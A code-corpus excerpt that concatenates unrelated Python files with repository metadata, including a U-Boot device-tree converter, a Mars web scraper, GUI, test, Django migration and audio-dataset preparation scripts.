arg_parser = argparse.ArgumentParser(description='Process some integers.')
arg_parser.add_argument('command', metavar='N', type=str, nargs='+',
help='help here')
arg_parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
return arg_parser.parse_args()
| 37.545455 | 78 | 0.68523 |
f2dc3e5ddf8d153d0a586aba52c1041f4d357b33 | 248 | py | Python | app_backend/databases/__init__.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 1 | 2020-06-21T04:08:26.000Z | 2020-06-21T04:08:26.000Z | app_backend/databases/__init__.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 13 | 2019-10-18T17:19:32.000Z | 2022-01-13T00:44:43.000Z | app_backend/databases/__init__.py | zhanghe06/bearing_project | 78a20fc321f72d3ae05c7ab7e52e01d02904e3fc | [
"MIT"
] | 5 | 2019-02-07T03:15:16.000Z | 2021-09-04T14:06:28.000Z | #!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: __init__.py
@time: 2020-02-29 23:23
"""
def func():
pass
class Main(object):
def __init__(self):
pass
if __name__ == '__main__':
pass
| 10.782609 | 26 | 0.612903 |
080c2ca58684fc90bb1a6259d2b86d039199c176 | 710 | py | Python | tests/exercises/travelling_salesman_test.py | AlexandraImbrisca/nondeterminism | f7935e22e4127abfefb29b5331805172c94e22f9 | [
"MIT"
] | 2 | 2022-02-11T17:20:31.000Z | 2022-02-24T09:36:23.000Z | tests/exercises/travelling_salesman_test.py | AlexandraImbrisca/nondeterminism | f7935e22e4127abfefb29b5331805172c94e22f9 | [
"MIT"
] | null | null | null | tests/exercises/travelling_salesman_test.py | AlexandraImbrisca/nondeterminism | f7935e22e4127abfefb29b5331805172c94e22f9 | [
"MIT"
] | null | null | null | import unittest
from helpers import Graph
from exercises import travelling_salesman
class TestTravellingSalesman(unittest.TestCase):
def setUp(self):
self.g1 = Graph([1, 2, 3], [(1, 2)])
self.g2 = Graph([1, 2, 3, 4], [(1, 2), (1, 4), (2, 3), (3, 4)])
self.g3 = Graph([1, 2, 3, 4],
[(1, 2), (1, 3), (1, 4), (2, 3), (2, 4), (3, 4)])
def test_no_solution(self):
self.assertFalse(travelling_salesman(self.g1))
def test_valid_solution(self):
self.assertTrue(travelling_salesman(self.g2)) # e.g. 1->2->3->4->1
self.assertTrue(travelling_salesman(self.g3)) # e.g. 1->2->4->3->1
if __name__ == '__main__':
unittest.main()
| 30.869565 | 75 | 0.571831 |
c75d80e269c62703f6a2b6f394c1cf133bc9a570 | 3,682 | py | Python | hexrd/ui/save_images_dialog.py | HEXRD/hexrdgui | d92915463f237e0521b5830655ae73bc5bcd9f80 | [
"BSD-3-Clause"
] | 13 | 2020-02-18T00:23:02.000Z | 2022-02-24T20:04:36.000Z | hexrd/ui/save_images_dialog.py | HEXRD/hexrdgui | d92915463f237e0521b5830655ae73bc5bcd9f80 | [
"BSD-3-Clause"
] | 656 | 2020-01-14T02:33:40.000Z | 2022-03-26T15:31:17.000Z | hexrd/ui/save_images_dialog.py | HEXRD/hexrdgui | d92915463f237e0521b5830655ae73bc5bcd9f80 | [
"BSD-3-Clause"
] | 6 | 2020-01-17T15:02:53.000Z | 2020-11-01T22:02:48.000Z | from PySide2.QtCore import QThreadPool
from PySide2.QtWidgets import QFileDialog, QInputDialog
from hexrd.ui.hexrd_config import HexrdConfig
from hexrd.ui.image_load_manager import ImageLoadManager
from hexrd.ui.ui_loader import UiLoader
from hexrd.ui.progress_dialog import ProgressDialog
from hexrd.ui.async_worker import AsyncWorker
class SaveImagesDialog:
def __init__(self, parent=None, ):
loader = UiLoader()
self.ui = loader.load_file('save_images_dialog.ui', parent)
self.parent_dir = HexrdConfig().working_dir
self.thread_pool = QThreadPool()
self.progress_dialog = ProgressDialog(self.ui)
self.setup_gui()
self.setup_connections()
def setup_gui(self):
self.ui.detectors.clear()
self.ui.detectors.addItems(HexrdConfig().detector_names)
self.ui.pwd.setText(self.parent_dir)
self.ui.pwd.setToolTip(self.parent_dir)
if HexrdConfig().unagg_images:
self.ui.ignore_agg.setEnabled(True)
def setup_connections(self):
self.ui.single_detector.toggled.connect(self.ui.detectors.setEnabled)
self.ui.change_directory.clicked.connect(self.change_directory)
def change_directory(self):
caption = HexrdConfig().images_dirtion = 'Select directory for images'
new_dir = QFileDialog.getExistingDirectory(
self.ui, caption, dir=self.parent_dir)
if new_dir:
HexrdConfig().working_dir = new_dir
self.parent_dir = new_dir
self.ui.pwd.setText(self.parent_dir)
self.ui.pwd.setToolTip(self.parent_dir)
def save_images(self):
if self.ui.ignore_agg.isChecked():
ims_dict = HexrdConfig().unagg_images
else:
ims_dict = HexrdConfig().imageseries_dict
dets = HexrdConfig().detector_names
if self.ui.single_detector.isChecked():
dets = [self.ui.detectors.currentText()]
for det in dets:
selected_format = self.ui.format.currentText().lower()
filename = f'{self.ui.file_stem.text()}_{det}.{selected_format}'
path = f'{self.parent_dir}/{filename}'
if selected_format.startswith('hdf5'):
selected_format = 'hdf5'
elif selected_format.startswith('npz'):
selected_format = 'frame-cache'
kwargs = {}
if selected_format == 'hdf5':
# A path must be specified. Set it ourselves for now.
kwargs['path'] = 'imageseries'
elif selected_format == 'frame-cache':
# Get the user to pick a threshold
result, ok = QInputDialog.getDouble(self.ui, 'HEXRD',
'Choose Threshold',
10, 0, 1e12, 3)
if not ok:
# User canceled...
return
kwargs['threshold'] = result
# This needs to be specified, but I think it just needs
# to be the same as the file name...
kwargs['cache_file'] = path
worker = AsyncWorker(
HexrdConfig().save_imageseries,
ims_dict.get(det), det, path, selected_format, **kwargs)
self.thread_pool.start(worker)
self.progress_dialog.setWindowTitle(f'Saving {filename}')
self.progress_dialog.setRange(0, 0)
worker.signals.finished.connect(self.progress_dialog.accept)
self.progress_dialog.exec_()
def exec_(self):
if self.ui.exec_():
self.save_images()
| 38.757895 | 78 | 0.606464 |
11050b66f71057821f0a2076fcbba0a4ad6f734e | 13,390 | py | Python | Arty-Z7-10/components/ext_sources/u-boot-ectf/tools/dtoc/dtoc.py | UNO-NULLify/eCTF19 | 1c1220445187bccb15e099760ba6cc42768af24c | [
"Apache-2.0"
] | 31 | 2018-01-16T17:11:44.000Z | 2022-03-16T13:51:24.000Z | Arty-Z7-10/components/ext_sources/u-boot-ectf/tools/dtoc/dtoc.py | UNO-NULLify/eCTF19 | 1c1220445187bccb15e099760ba6cc42768af24c | [
"Apache-2.0"
] | 1 | 2021-04-29T09:08:08.000Z | 2021-05-08T07:57:06.000Z | Arty-Z7-10/components/ext_sources/u-boot-ectf/tools/dtoc/dtoc.py | UNO-NULLify/eCTF19 | 1c1220445187bccb15e099760ba6cc42768af24c | [
"Apache-2.0"
] | 30 | 2018-05-02T08:43:27.000Z | 2022-01-23T03:25:54.000Z | #!/usr/bin/python
#
# Copyright (C) 2016 Google, Inc
# Written by Simon Glass <sjg@chromium.org>
#
# SPDX-License-Identifier: GPL-2.0+
#
import copy
from optparse import OptionError, OptionParser
import os
import struct
import sys
# Bring in the patman libraries
our_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(our_path, '../patman'))
import fdt
import fdt_select
import fdt_util
# When we see these properties we ignore them - i.e. do not create a structure member
PROP_IGNORE_LIST = [
'#address-cells',
'#gpio-cells',
'#size-cells',
'compatible',
'linux,phandle',
"status",
'phandle',
'u-boot,dm-pre-reloc',
]
# C type declarations for the tyues we support
TYPE_NAMES = {
fdt.TYPE_INT: 'fdt32_t',
fdt.TYPE_BYTE: 'unsigned char',
fdt.TYPE_STRING: 'const char *',
fdt.TYPE_BOOL: 'bool',
};
STRUCT_PREFIX = 'dtd_'
VAL_PREFIX = 'dtv_'
def Conv_name_to_c(name):
"""Convert a device-tree name to a C identifier
Args:
name: Name to convert
Return:
String containing the C version of this name
"""
str = name.replace('@', '_at_')
str = str.replace('-', '_')
str = str.replace(',', '_')
str = str.replace('/', '__')
return str
def TabTo(num_tabs, str):
if len(str) >= num_tabs * 8:
return str + ' '
return str + '\t' * (num_tabs - len(str) // 8)
class DtbPlatdata:
"""Provide a means to convert device tree binary data to platform data
The output of this process is C structures which can be used in space-
constrained encvironments where the ~3KB code overhead of device tree
code is not affordable.
Properties:
fdt: Fdt object, referencing the device tree
_dtb_fname: Filename of the input device tree binary file
_valid_nodes: A list of Node object with compatible strings
_options: Command-line options
_phandle_node: A dict of nodes indexed by phandle number (1, 2...)
_outfile: The current output file (sys.stdout or a real file)
_lines: Stashed list of output lines for outputting in the future
_phandle_node: A dict of Nodes indexed by phandle (an integer)
"""
def __init__(self, dtb_fname, options):
self._dtb_fname = dtb_fname
self._valid_nodes = None
self._options = options
self._phandle_node = {}
self._outfile = None
self._lines = []
def SetupOutput(self, fname):
"""Set up the output destination
Once this is done, future calls to self.Out() will output to this
file.
Args:
fname: Filename to send output to, or '-' for stdout
"""
if fname == '-':
self._outfile = sys.stdout
else:
self._outfile = open(fname, 'w')
def Out(self, str):
"""Output a string to the output file
Args:
str: String to output
"""
self._outfile.write(str)
def Buf(self, str):
"""Buffer up a string to send later
Args:
str: String to add to our 'buffer' list
"""
self._lines.append(str)
def GetBuf(self):
"""Get the contents of the output buffer, and clear it
Returns:
The output buffer, which is then cleared for future use
"""
lines = self._lines
self._lines = []
return lines
def GetValue(self, type, value):
"""Get a value as a C expression
For integers this returns a byte-swapped (little-endian) hex string
For bytes this returns a hex string, e.g. 0x12
For strings this returns a literal string enclosed in quotes
For booleans this return 'true'
Args:
type: Data type (fdt_util)
value: Data value, as a string of bytes
"""
if type == fdt.TYPE_INT:
return '%#x' % fdt_util.fdt32_to_cpu(value)
elif type == fdt.TYPE_BYTE:
return '%#x' % ord(value[0])
elif type == fdt.TYPE_STRING:
return '"%s"' % value
elif type == fdt.TYPE_BOOL:
return 'true'
def GetCompatName(self, node):
"""Get a node's first compatible string as a C identifier
Args:
node: Node object to check
Return:
C identifier for the first compatible string
"""
compat = node.props['compatible'].value
if type(compat) == list:
compat = compat[0]
return Conv_name_to_c(compat)
def ScanDtb(self):
"""Scan the device tree to obtain a tree of notes and properties
Once this is done, self.fdt.GetRoot() can be called to obtain the
device tree root node, and progress from there.
"""
self.fdt = fdt_select.FdtScan(self._dtb_fname)
def ScanTree(self):
"""Scan the device tree for useful information
This fills in the following properties:
_phandle_node: A dict of Nodes indexed by phandle (an integer)
_valid_nodes: A list of nodes we wish to consider include in the
platform data
"""
node_list = []
self._phandle_node = {}
for node in self.fdt.GetRoot().subnodes:
if 'compatible' in node.props:
status = node.props.get('status')
if (not options.include_disabled and not status or
status.value != 'disabled'):
node_list.append(node)
phandle_prop = node.props.get('phandle')
if phandle_prop:
phandle = phandle_prop.GetPhandle()
self._phandle_node[phandle] = node
self._valid_nodes = node_list
def IsPhandle(self, prop):
"""Check if a node contains phandles
We have no reliable way of detecting whether a node uses a phandle
or not. As an interim measure, use a list of known property names.
Args:
prop: Prop object to check
Return:
True if the object value contains phandles, else False
"""
if prop.name in ['clocks']:
return True
return False
def ScanStructs(self):
"""Scan the device tree building up the C structures we will use.
Build a dict keyed by C struct name containing a dict of Prop
object for each struct field (keyed by property name). Where the
same struct appears multiple times, try to use the 'widest'
property, i.e. the one with a type which can express all others.
Once the widest property is determined, all other properties are
updated to match that width.
"""
structs = {}
for node in self._valid_nodes:
node_name = self.GetCompatName(node)
fields = {}
# Get a list of all the valid properties in this node.
for name, prop in node.props.items():
if name not in PROP_IGNORE_LIST and name[0] != '#':
fields[name] = copy.deepcopy(prop)
# If we've seen this node_name before, update the existing struct.
if node_name in structs:
struct = structs[node_name]
for name, prop in fields.items():
oldprop = struct.get(name)
if oldprop:
oldprop.Widen(prop)
else:
struct[name] = prop
# Otherwise store this as a new struct.
else:
structs[node_name] = fields
upto = 0
for node in self._valid_nodes:
node_name = self.GetCompatName(node)
struct = structs[node_name]
for name, prop in node.props.items():
if name not in PROP_IGNORE_LIST and name[0] != '#':
prop.Widen(struct[name])
upto += 1
return structs
def GenerateStructs(self, structs):
"""Generate struct defintions for the platform data
This writes out the body of a header file consisting of structure
definitions for node in self._valid_nodes. See the documentation in
README.of-plat for more information.
"""
self.Out('#include <stdbool.h>\n')
self.Out('#include <libfdt.h>\n')
# Output the struct definition
for name in sorted(structs):
self.Out('struct %s%s {\n' % (STRUCT_PREFIX, name));
for pname in sorted(structs[name]):
prop = structs[name][pname]
if self.IsPhandle(prop):
# For phandles, include a reference to the target
self.Out('\t%s%s[%d]' % (TabTo(2, 'struct phandle_2_cell'),
Conv_name_to_c(prop.name),
len(prop.value) / 2))
else:
ptype = TYPE_NAMES[prop.type]
self.Out('\t%s%s' % (TabTo(2, ptype),
Conv_name_to_c(prop.name)))
if type(prop.value) == list:
self.Out('[%d]' % len(prop.value))
self.Out(';\n')
self.Out('};\n')
def GenerateTables(self):
"""Generate device defintions for the platform data
This writes out C platform data initialisation data and
U_BOOT_DEVICE() declarations for each valid node. See the
documentation in README.of-plat for more information.
"""
self.Out('#include <common.h>\n')
self.Out('#include <dm.h>\n')
self.Out('#include <dt-structs.h>\n')
self.Out('\n')
node_txt_list = []
for node in self._valid_nodes:
struct_name = self.GetCompatName(node)
var_name = Conv_name_to_c(node.name)
self.Buf('static struct %s%s %s%s = {\n' %
(STRUCT_PREFIX, struct_name, VAL_PREFIX, var_name))
for pname, prop in node.props.items():
if pname in PROP_IGNORE_LIST or pname[0] == '#':
continue
ptype = TYPE_NAMES[prop.type]
member_name = Conv_name_to_c(prop.name)
self.Buf('\t%s= ' % TabTo(3, '.' + member_name))
# Special handling for lists
if type(prop.value) == list:
self.Buf('{')
vals = []
# For phandles, output a reference to the platform data
# of the target node.
if self.IsPhandle(prop):
# Process the list as pairs of (phandle, id)
it = iter(prop.value)
for phandle_cell, id_cell in zip(it, it):
phandle = fdt_util.fdt32_to_cpu(phandle_cell)
id = fdt_util.fdt32_to_cpu(id_cell)
target_node = self._phandle_node[phandle]
name = Conv_name_to_c(target_node.name)
vals.append('{&%s%s, %d}' % (VAL_PREFIX, name, id))
else:
for val in prop.value:
vals.append(self.GetValue(prop.type, val))
self.Buf(', '.join(vals))
self.Buf('}')
else:
self.Buf(self.GetValue(prop.type, prop.value))
self.Buf(',\n')
self.Buf('};\n')
# Add a device declaration
self.Buf('U_BOOT_DEVICE(%s) = {\n' % var_name)
self.Buf('\t.name\t\t= "%s",\n' % struct_name)
self.Buf('\t.platdata\t= &%s%s,\n' % (VAL_PREFIX, var_name))
self.Buf('\t.platdata_size\t= sizeof(%s%s),\n' %
(VAL_PREFIX, var_name))
self.Buf('};\n')
self.Buf('\n')
# Output phandle target nodes first, since they may be referenced
# by others
if 'phandle' in node.props:
self.Out(''.join(self.GetBuf()))
else:
node_txt_list.append(self.GetBuf())
# Output all the nodes which are not phandle targets themselves, but
# may reference them. This avoids the need for forward declarations.
for node_txt in node_txt_list:
self.Out(''.join(node_txt))
if __name__ != "__main__":
pass
parser = OptionParser()
parser.add_option('-d', '--dtb-file', action='store',
help='Specify the .dtb input file')
parser.add_option('--include-disabled', action='store_true',
help='Include disabled nodes')
parser.add_option('-o', '--output', action='store', default='-',
help='Select output filename')
(options, args) = parser.parse_args()
if not args:
raise ValueError('Please specify a command: struct, platdata')
plat = DtbPlatdata(options.dtb_file, options)
plat.ScanDtb()
plat.ScanTree()
plat.SetupOutput(options.output)
structs = plat.ScanStructs()
for cmd in args[0].split(','):
if cmd == 'struct':
plat.GenerateStructs(structs)
elif cmd == 'platdata':
plat.GenerateTables()
else:
raise ValueError("Unknown command '%s': (use: struct, platdata)" % cmd)
| 34.960836 | 85 | 0.557879 |
df788209b8b1bada71349320ba8150284952b204 | 4,555 | py | Python | mission_to_mars.py | ARMcK-hub/web-scraping-challenge | 9ced38c2e463271b8d1342713ea3e7a6b6bdba60 | [
"MIT"
] | null | null | null | mission_to_mars.py | ARMcK-hub/web-scraping-challenge | 9ced38c2e463271b8d1342713ea3e7a6b6bdba60 | [
"MIT"
] | 3 | 2022-02-24T08:26:31.000Z | 2022-02-28T05:40:13.000Z | mission_to_mars.py | ARMcK-hub/Mission-to-Mars | 20d470b08a7df554f8d26f248694574a2e190128 | [
"MIT"
] | null | null | null | '''
Mission to Mars Web Scrape Script
Author: Andrew McKinney
Creation Date: 2020-02-14
'''
# importing dependencies
from bs4 import BeautifulSoup
import requests
import pandas as pd
from splinter import Browser
def houston():
### Top NASA new title and paragraph
# defining web url
# NOTE: THIS HAS PROBLEMS WITH CALLING THIS URL RECURRENT AND DOES NOT GET BACK THE ACTUAL HTML AND GETS CSS INSTEAD
url_nasa_news = 'https://mars.nasa.gov/news'
print(f'Visiting {url_nasa_news}')
# creating splinter browser and visint url
executable_path = {'executable_path': 'chromedriver.exe'}
browser = Browser('chrome', **executable_path, headless=True)
browser.visit(url_nasa_news)
html = browser.html
# Create BeautifulSoup object; parse with 'html.parser'
soup = BeautifulSoup(html, 'html.parser')
# Handeling unknown, internal BS4 errors that occur on 1st run
try:
news_title = soup.find('div', class_='content_title').text.strip()
news_para = soup.find('div', class_='article_teaser_body').text.strip()
except:
executable_path = {'executable_path': 'chromedriver.exe'}
browser = Browser('chrome', **executable_path, headless=True)
browser.visit(url_nasa_news)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
news_title = soup.find('div', class_='content_title').text.strip()
news_para = soup.find('div', class_='article_teaser_body').text.strip()
print('Done')
### NASA featured image
# defining web url
url_nasa_imgs = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
print(f'Visiting {url_nasa_imgs}')
# visiting url
browser.visit(url_nasa_imgs)
html = browser.html
# Create BeautifulSoup object; parse with 'html.parser'
soup = BeautifulSoup(html, 'html.parser')
featured_image_url = 'https://www.jpl.nasa.gov' + soup.find('a', class_='button fancybox')['data-fancybox-href']
print('Done')
### Mars Weather
# defining web url
url_mars_weath = 'https://twitter.com/marswxreport'
print(f'Requesting {url_mars_weath}')
# get html using requests, browser scraping does not work for this
response = requests.get(url_mars_weath).text
# Create BeautifulSoup object; parse with 'html.parser'
soup = BeautifulSoup(response, 'html.parser')
mars_weather = soup.find('p', class_='TweetTextSize').text.replace('\n', ' ').split(' hPapic')[0]
print('Done')
### Mars Facts
# defining web url
url_mars_fact = 'https://space-facts.com/mars/'
print(f'Reading {url_mars_fact}')
# scraping with pandas
mars_facts = pd.read_html(url_mars_fact)[1].drop(columns={'Earth'})
mars_facts_html = mars_facts.to_html()
print('Done')
### Mars Hem Images
url_main_mars_images = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
print(f'Visiting {url_main_mars_images}')
# soupifying main page
browser.visit(url_main_mars_images)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
# creating image list for searches
image_headers = soup.find_all('div', class_='description')
image_list = []
for items in image_headers:
image_list.append(items.h3.text)
# creating empty ouptput dictionary
mars_hem_dict = []
#cycling through image list to navigate website and scrape info
for image in image_list:
# navigating to image page
browser.click_link_by_partial_text(image)
# resetting html object to current page
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
# scraping items per image
title = soup.find('h2', class_='title').text.strip()
img_url = 'https://astrogeology.usgs.gov/' + soup.find('img', class_='wide-image')['src']
dl_img_url = soup.find('a', text='Original')['href']
# appending image items to dictionary
mars_hem_dict.append({'title' : title, 'img_url' : img_url ,'dl_img_url' : dl_img_url})
# navigating back to master page list
browser.back()
print('Done')
to_houston = ({
'news_title' : news_title,
'news_para' : news_para,
'featured_image_url' : featured_image_url,
'mars_weather' : mars_weather,
'mars_facts_html' : mars_facts_html,
'mars_hem_dict' : mars_hem_dict
})
return to_houston | 29.577922 | 120 | 0.661471 |
bd8b49bbdffdfe9a682449700fdcea41308a9520 | 5,371 | py | Python | interfaceTest/testCase/user/testAddAddress.py | liberjiang/interface_framework | ab25e93c1e079da3df8441fca620927061aae252 | [
"Apache-2.0"
] | null | null | null | interfaceTest/testCase/user/testAddAddress.py | liberjiang/interface_framework | ab25e93c1e079da3df8441fca620927061aae252 | [
"Apache-2.0"
] | null | null | null | interfaceTest/testCase/user/testAddAddress.py | liberjiang/interface_framework | ab25e93c1e079da3df8441fca620927061aae252 | [
"Apache-2.0"
] | null | null | null | import unittest
import paramunittest
import readConfig as readConfig
from common import Log as Log
from common import common
from common import configHttp as ConfigHttp
from common import businessCommon
addAddress_xls = common.get_xls("userCase.xlsx", "addAddress")
localReadConfig = readConfig.ReadConfig()
configHttp = ConfigHttp.ConfigHttp()
@paramunittest.parametrized(*addAddress_xls)
class AddAddress(unittest.TestCase):
def setParameters(self, case_name, method, token, sex, fname, lname, tel, standby_tel, address1, address2, city, state, postcode, country_id, tax_number, company, fax, is_default, result, code, msg):
"""
set params
:param case_name:
:param method:
:param token:
:param sex:
:param fname:
:param lname:
:param tel:
:param standby_tel:
:param address1:
:param address2:
:param city:
:param state:
:param postcode:
:param country_id:
:param tax_number:
:param company:
:param fax:
:param is_default:
:param result:
:param code:
:param msg:
:return:
"""
self.case_name = str(case_name)
self.method = str(method)
self.token = str(token)
self.sex = str(sex)
self.fname = str(fname)
self.lname = str(lname)
self.tel = str(tel)
self.standby_tel = str(standby_tel)
self.address1 = str(address1)
self.address2 = str(address2)
self.city = str(city)
self.state = str(state)
self.postcode = str(postcode)
self.country_id = str(country_id)
self.tax_number = str(tax_number)
self.company = str(company)
self.fax = str(fax)
self.is_default = str(is_default)
self.result = str(result)
self.code = str(code)
self.msg = str(msg)
self.info = None
def description(self):
"""
:return:
"""
self.case_name
def setUp(self):
"""
:return:
"""
self.log = Log.MyLog.get_log()
self.logger = self.log.get_logger()
self.login_token = businessCommon.login()
def testAddAddress(self):
"""
test body
:return:
"""
# set url
self.url = common.get_url_from_xml('addAddress')
configHttp.set_url(self.url)
# get token
if self.token == '0':
token = self.login_token
elif self.token == '1':
token = localReadConfig.get_headers("TOKEN_U")
else:
token = self.token
# set headers
header = {"token": str(token)}
configHttp.set_headers(header)
# set params
data = {"sex": self.sex,
"fname": self.fname,
"lname": self.lname,
"tel": self.tel,
"standby_tel": self.standby_tel,
"address1": self.address1,
"address2": self.address2,
"city": self.city,
"state": self.state,
"postcode": self.postcode,
"country_id": self.country_id,
"tax_number": self.tax_number,
"company": self.company,
"fax": self.fax,
"is_default": self.is_default}
configHttp.set_data(data)
# test interface
self.return_json = configHttp.post()
# check result
self.checkResult()
def tearDown(self):
"""
:return:
"""
# logout
businessCommon.logout(self.login_token)
self.log.build_case_line(self.case_name, self.info['code'], self.info['msg'])
def checkResult(self):
"""
check test result
:return:
"""
self.info = self.return_json.json()
common.show_return_msg(self.return_json)
if self.result == '0':
self.assertEqual(self.info['code'], self.code)
self.assertEqual(self.info['msg'], self.msg)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'sex'), self.sex)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'fname'), self.fname)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'lname'), self.lname)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'tel'), self.tel)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'address1'), self.address1)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'city'), self.city)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'state'), self.state)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'postcode'), self.postcode)
self.assertEqual(common.get_value_from_return_json(self.info, 'address', 'countryId'), self.country_id)
if self.result == '1':
self.assertEqual(self.info['code'], self.code)
self.assertEqual(self.info['msg'], self.msg)
| 33.779874 | 204 | 0.566003 |
1ba7b97f7bceba8dcb82401b0dafd23b7f22bc66 | 1,165 | py | Python | polls/migrations/0001_initial.py | Etuloser/mysite | d7e50749581d186f74c30744dfd70ce4bf96524a | [
"BSD-3-Clause"
] | null | null | null | polls/migrations/0001_initial.py | Etuloser/mysite | d7e50749581d186f74c30744dfd70ce4bf96524a | [
"BSD-3-Clause"
] | null | null | null | polls/migrations/0001_initial.py | Etuloser/mysite | d7e50749581d186f74c30744dfd70ce4bf96524a | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.0.1 on 2018-01-25 02:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question'),
),
]
| 31.486486 | 114 | 0.577682 |
c5d009e000f62ee6cf4552d7da9766f100d0bbab | 3,083 | py | Python | ddsp/training/data_preparation/prepare_tfrecord.py | jeonghopark/ddsp | 6858ba7df1d6bf6c2208e19bafd8aa5c473c57eb | [
"Apache-2.0"
] | 2 | 2020-02-07T01:03:29.000Z | 2020-04-24T13:53:05.000Z | ddsp/training/data_preparation/prepare_tfrecord.py | jeonghopark/ddsp | 6858ba7df1d6bf6c2208e19bafd8aa5c473c57eb | [
"Apache-2.0"
] | null | null | null | ddsp/training/data_preparation/prepare_tfrecord.py | jeonghopark/ddsp | 6858ba7df1d6bf6c2208e19bafd8aa5c473c57eb | [
"Apache-2.0"
] | 2 | 2020-04-07T06:10:15.000Z | 2020-05-16T04:36:10.000Z | # Copyright 2020 The DDSP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Create a TFRecord dataset from audio files.
Usage:
====================
ddsp_prepare_tfrecord \
--input_audio_filepatterns=/path/to/wavs/*wav,/path/to/mp3s/*mp3 \
--output_tfrecord_path=/path/to/output.tfrecord \
--num_shards=10 \
--alsologtostderr
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from ddsp.training.data_preparation.prepare_tfrecord_lib import prepare_tfrecord
import tensorflow.compat.v1 as tf
FLAGS = flags.FLAGS
flags.DEFINE_list(
'input_audio_filepatterns', [],
'List of filepatterns to glob for input audio files.')
flags.DEFINE_string(
'output_tfrecord_path', None,
'The prefix path to the output TFRecord. Shard numbers will be added to '
'actual path(s).')
flags.DEFINE_integer(
'num_shards', None,
'The number of shards to use for the TFRecord. If None, this number will '
'be determined automatically.')
flags.DEFINE_integer(
'sample_rate', 16000,
'The sample rate to use for the audio.')
flags.DEFINE_integer(
'frame_rate', 250,
'The frame rate to use for f0 and loudness features. If set to 0, '
'these features will not be computed.')
flags.DEFINE_float(
'example_secs', 4,
'The length of each example in seconds. Input audio will be split to this '
'length using a sliding window. If None, each full piece of audio will be '
'used as an example.')
flags.DEFINE_float(
'sliding_window_hop_secs', 1,
'The hop size in seconds to use when splitting audio into constant-length '
'examples.')
flags.DEFINE_list(
'pipeline_options', '--runner=DirectRunner',
'A comma-separated list of command line arguments to be used as options '
'for the Beam Pipeline.')
def run():
input_audio_paths = []
for filepattern in FLAGS.input_audio_filepatterns:
input_audio_paths.extend(tf.io.gfile.glob(filepattern))
prepare_tfrecord(
input_audio_paths,
FLAGS.output_tfrecord_path,
num_shards=FLAGS.num_shards,
sample_rate=FLAGS.sample_rate,
frame_rate=FLAGS.frame_rate,
window_secs=FLAGS.example_secs,
hop_secs=FLAGS.sliding_window_hop_secs,
pipeline_options=FLAGS.pipeline_options)
def main(unused_argv):
"""From command line."""
run()
def console_entry_point():
"""From pip installed script."""
tf.disable_v2_behavior()
app.run(main)
if __name__ == '__main__':
console_entry_point()
| 30.524752 | 80 | 0.733377 |
f7b503daa7da583c38d3832b58cd3f503df2ce44 | 223 | py | Python | tests/test_linotype.py | techdragon/linotype | 457915c0d2e895c235471a7a0ab32710bd9a8de5 | [
"BSD-2-Clause"
] | null | null | null | tests/test_linotype.py | techdragon/linotype | 457915c0d2e895c235471a7a0ab32710bd9a8de5 | [
"BSD-2-Clause"
] | null | null | null | tests/test_linotype.py | techdragon/linotype | 457915c0d2e895c235471a7a0ab32710bd9a8de5 | [
"BSD-2-Clause"
] | null | null | null |
from click.testing import CliRunner
from linotype.__main__ import main
def test_main():
runner = CliRunner()
result = runner.invoke(main, [])
assert result.output == '()\n'
assert result.exit_code == 0
| 17.153846 | 36 | 0.67713 |
9043b9f7990a9df2e0599006a628dcfbe512c534 | 1,182 | py | Python | azure/mgmt/network/v2016_09_01/models/effective_network_security_group_list_result.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1 | 2022-01-25T22:52:58.000Z | 2022-01-25T22:52:58.000Z | azure/mgmt/network/v2016_09_01/models/effective_network_security_group_list_result.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | azure/mgmt/network/v2016_09_01/models/effective_network_security_group_list_result.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
